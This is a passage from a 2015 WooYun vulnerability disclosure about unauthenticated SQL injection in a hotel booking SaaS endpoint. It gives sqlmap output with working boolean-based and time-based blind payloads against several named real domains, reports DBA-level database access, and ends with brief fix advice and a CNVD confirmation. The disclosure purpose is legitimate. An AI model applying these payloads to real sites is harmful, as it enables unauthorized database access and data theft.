Payload: http://www.wakingtown-hotel.com:80/saas/Booking/step2/?client_account=qh_hyhj' AND 7358=7358 AND 'zyCo'='zyCo&jsoncallback=jQuery183032226093858480453_1425380859440&language=zh-cn&param={type:1,catalog_id:1,total:1,adults:1,products_daily:[{product_id:2,total:1,days:[{day:2015-03-03,price:418,plan_id:2,plan_title:%E7%BD%91%E7%BB%9C%E7%A4%BC%E5%8C%85%E4%BB%B7,plan_type:0,guest_range_id:67731}]}]}&_=1425380888282
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://www.wakingtown-hotel.com:80/saas/Booking/step2/?client_account=qh_hyhj' AND SLEEP(5) AND 'Iomv'='Iomv&jsoncallback=jQuery183032226093858480453_1425380859440&language=zh-cn&param={type:1,catalog_id:1,total:1,adults:1,products_daily:[{product_id:2,total:1,days:[{day:2015-03-03,price:418,plan_id:2,plan_title:%E7%BD%91%E7%BB%9C%E7%A4%BC%E5%8C%85%E4%BB%B7,plan_type:0,guest_range_id:67731}]}]}&_=1425380888282
---
back-end DBMS: MySQL 5.0.11
current database: 'dossm'
current user is DBA: True


案例11.http://www.sevenraygolf.com

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://www.sevenraygolf.com:80/saas/Booking/step2/?client_account=qh_hyhj' AND 7109=7109 AND 'jUUJ'='jUUJ&jsoncallback=jQuery183032226093858480453_1425380859440&language=zh-cn&param={"type":1,"catalog_id":1,"total":1,"adults":1,"products_daily":[{"product_id":2,"total":1,"days":[{"day":"2015-03-03","price":"418","plan_id":"2","plan_title":"%E7%BD%91%E7%BB%9C%E7%A4%BC%E5%8C%85%E4%BB%B7","plan_type":0,"guest_range_id":67731}]}]}&_=1425380888282
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://www.sevenraygolf.com:80/saas/Booking/step2/?client_account=qh_hyhj' AND SLEEP(5) AND 'rcen'='rcen&jsoncallback=jQuery183032226093858480453_1425380859440&language=zh-cn&param={"type":1,"catalog_id":1,"total":1,"adults":1,"products_daily":[{"product_id":2,"total":1,"days":[{"day":"2015-03-03","price":"418","plan_id":"2","plan_title":"%E7%BD%91%E7%BB%9C%E7%A4%BC%E5%8C%85%E4%BB%B7","plan_type":0,"guest_range_id":67731}]}]}&_=1425380888282
---
back-end DBMS: MySQL 5.0.11
current database: 'dossm'
current user is DBA: True


案例12.http://www.znhyfd.cn

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://www.znhyfd.cn:80/saas/Booking/step2/?client_account=qh_hyhj' AND 9717=9717 AND 'xSXF'='xSXF&jsoncallback=jQuery183032226093858480453_1425380859440&language=zh-cn&param={type:1,catalog_id:1,total:1,adults:1,products_daily:[{product_id:2,total:1,days:[{day:2015-03-03,price:418,plan_id:2,plan_title:%E7%BD%91%E7%BB%9C%E7%A4%BC%E5%8C%85%E4%BB%B7,plan_type:0,guest_range_id:67731}]}]}&_=1425380888282
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://www.znhyfd.cn:80/saas/Booking/step2/?client_account=qh_hyhj' AND SLEEP(5) AND 'MOGW'='MOGW&jsoncallback=jQuery183032226093858480453_1425380859440&language=zh-cn&param={type:1,catalog_id:1,total:1,adults:1,products_daily:[{product_id:2,total:1,days:[{day:2015-03-03,price:418,plan_id:2,plan_title:%E7%BD%91%E7%BB%9C%E7%A4%BC%E5%8C%85%E4%BB%B7,plan_type:0,guest_range_id:67731}]}]}&_=1425380888282
---
back-end DBMS: MySQL 5.0.11
current database: 'dossm'
current user is DBA: True


0x02 其它注入点均可以注入,证明截图如下:

6.jpg


7.jpg


8.jpg


9.jpg


10.jpg


11.jpg


12.jpg


13.jpg


14.jpg


15.jpg


16.jpg

修复方案:

问题蛮严重的,注入点都不需要登陆,所以连注册也省了
1.注入点过滤
2.建议加全局过滤脚本

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-03-17 11:24

厂商回复:

CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式向软件生产厂商通报。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-09-22 18:51 | 明月影 ( 路人 | Rank:12 漏洞数:8 | 学姿势,学思路。)

    没有评论?